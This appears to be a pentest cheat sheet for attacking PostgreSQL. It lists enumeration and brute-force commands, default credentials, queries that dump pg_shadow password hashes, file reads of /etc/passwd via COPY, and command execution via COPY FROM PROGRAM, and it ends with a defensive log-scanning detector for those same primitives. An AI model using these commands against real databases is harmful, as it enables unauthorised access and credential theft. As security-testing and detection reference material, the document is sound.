# 5432 - PostgreSQL

PostgreSQL is an open source database found mostly on Linux systems, although it is highly portable and runs on Windows and macOS as well. If the database is not properly configured and credentials have been obtained, it is possible to perform various activities such as reading and writing system files and executing arbitrary code.

## Enumeration

### Nmap

**Version disclosure:**

`nmap -sV -p 5432 10.0.0.1`

**Bruteforce credentials:**

`nmap -p 5432 --script pgsql-brute`

### Metasploit

**Version disclosure:**

`auxiliary/scanner/postgres/postgres_version`

**Bruteforce login:**

`auxiliary/scanner/postgres/postgres_login`

**Dump schema:**

`auxiliary/scanner/postgres/postgres_schemadump`

**Database enumeration:**

`auxiliary/admin/postgres/postgres_sql`

**Hashdump:**

`auxiliary/scanner/postgres/postgres_hashdump`

**Read files:**

`auxiliary/admin/postgres/postgres_readfile`

**Reverse shell:**

`exploit/linux/postgres/postgres_payload`

## Login

Login using psql:

`psql -h 192.168.100.11 -U postgres`

## Common/default credentials

| Username | Password |
| -------- | -------- |
| postgres | postgres |
| postgres | password |
| postgres | admin    |
| admin    | admin    |
| admin    | password |

### Bruteforce login credentials

```
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.120 postgres
```

## Commands

| Description                         | Command                                                                                                                                         |
| ----------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------- |
| List databases                      | \l                                                                                                                                              |
| List database users                 | \du                                                                                                                                             |
| List existing tables                | \dt                                                                                                                                             |
| Connect to a specific database      | \c database_name                                                                                                                                |
| Get detailed information on a table | \d+ table_name                                                                                                                                  |
| Get table content                   | SELECT * FROM table_name;                                                                                                                       |
| Retrieve database passwords         | SELECT * FROM users;<br>OR<br>SELECT usename, passwd FROM pg_shadow;                                                                            |
| Dump database content               | SELECT usename, passwd FROM pg_shadow;<br>OR<br>pg_dump --host=192.168.100.11 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump |
| Create a new database               | CREATE DATABASE db_name;                                                                                                                        |
| Exit psql                           | \q                                                                                                                                              |

## Command execution

PostgreSQL can interact with the underlying operating system: a database administrator can run server-side functions that list directories, read files and retrieve their output through ordinary queries.

List the contents of the data directory:

`postgres=# select pg_ls_dir('./');`

Read a server-side PostgreSQL file:

`postgres=# select pg_read_file('PG_VERSION', 0, 200);`

It is also possible to create a table in order to store and view the contents of a file that exists on the host:

```
postgres=# CREATE TABLE temp(t TEXT);
postgres=# COPY temp FROM '/etc/passwd';
postgres=# SELECT * FROM temp;
```

Or use the Metasploit module:

`auxiliary/admin/postgres/postgres_readfile`

### Execute command

```
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'sudo -l';
SELECT * FROM cmd_exec;
```
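From the defender's side, the primitives on this page (pg_ls_dir, pg_read_file, COPY FROM a file, COPY FROM PROGRAM) and the failed logins a brute-force run leaves behind are all visible in the server log. The script below is an added example, not part of the original cheat sheet: it assumes `log_line_prefix = '%m [%p] %u@%d %h '` with `log_statement = 'all'`, and the log lines it scans are constructed samples.

```python
import re
from collections import Counter

# Constructed sample of a PostgreSQL server log (not from a real host), in the
# assumed format log_line_prefix = '%m [%p] %u@%d %h ' with log_statement = 'all'.
SAMPLE_LOG = """\
2024-01-01 10:00:01.000 UTC [2201] postgres@postgres 10.0.0.5 FATAL:  password authentication failed for user "postgres"
2024-01-01 10:00:01.200 UTC [2202] postgres@postgres 10.0.0.5 FATAL:  password authentication failed for user "postgres"
2024-01-01 10:00:01.400 UTC [2203] admin@postgres 10.0.0.5 FATAL:  password authentication failed for user "admin"
2024-01-01 10:00:09.000 UTC [2210] postgres@postgres 10.0.0.5 LOG:  statement: select pg_ls_dir('./');
2024-01-01 10:00:12.000 UTC [2210] postgres@postgres 10.0.0.5 LOG:  statement: select pg_read_file('PG_VERSION', 0, 200);
2024-01-01 10:00:20.000 UTC [2210] postgres@postgres 10.0.0.5 LOG:  statement: COPY temp FROM '/etc/passwd';
2024-01-01 10:00:25.000 UTC [2210] postgres@postgres 10.0.0.5 LOG:  statement: COPY cmd_exec FROM PROGRAM 'sudo -l';
2024-01-01 10:01:00.000 UTC [2215] app@shop 10.0.0.9 LOG:  statement: SELECT * FROM orders WHERE id = 42;
"""

# One log line: timestamp, pid, user@db, client host, severity, message.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>\S+)@(?P<db>\S+) "
    r"(?P<host>\S+) (?P<level>[A-Z]+):\s+(?P<msg>.*)$")

# Server-side file and OS access primitives from this page; all are restricted to
# superusers unless delegated (pg_read_server_files, pg_execute_server_program).
SUSPICIOUS = {
    "pg_ls_dir": re.compile(r"\bpg_ls_dir\s*\(", re.I),
    "pg_read_file": re.compile(r"\bpg_read_(?:binary_)?file\s*\(", re.I),
    "copy_from_file": re.compile(r"\bCOPY\b.+\bFROM\s+'", re.I),
    "copy_from_program": re.compile(r"\bCOPY\b.+\bFROM\s+PROGRAM\b", re.I),
}

def analyze(log_text, fail_threshold=3):
    """Return (alerts, brute_force_hosts); alerts are (rule, user, host, statement)."""
    alerts, failures = [], Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # continuation lines of multi-line statements are skipped
        msg = m["msg"]
        if m["level"] == "FATAL" and "password authentication failed" in msg:
            failures[m["host"]] += 1  # count failed logins per client address
            continue
        stmt = msg.partition("statement: ")[2]  # empty for non-statement messages
        for rule, pat in SUSPICIOUS.items():
            if pat.search(stmt):
                alerts.append((rule, m["user"], m["host"], stmt))
    brute = [h for h, n in failures.items() if n >= fail_threshold]
    return alerts, brute
```

Running `analyze(SAMPLE_LOG)` flags the four file/command statements from 10.0.0.5 and reports that host as a brute-force source, while the ordinary application query from 10.0.0.9 is left alone.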
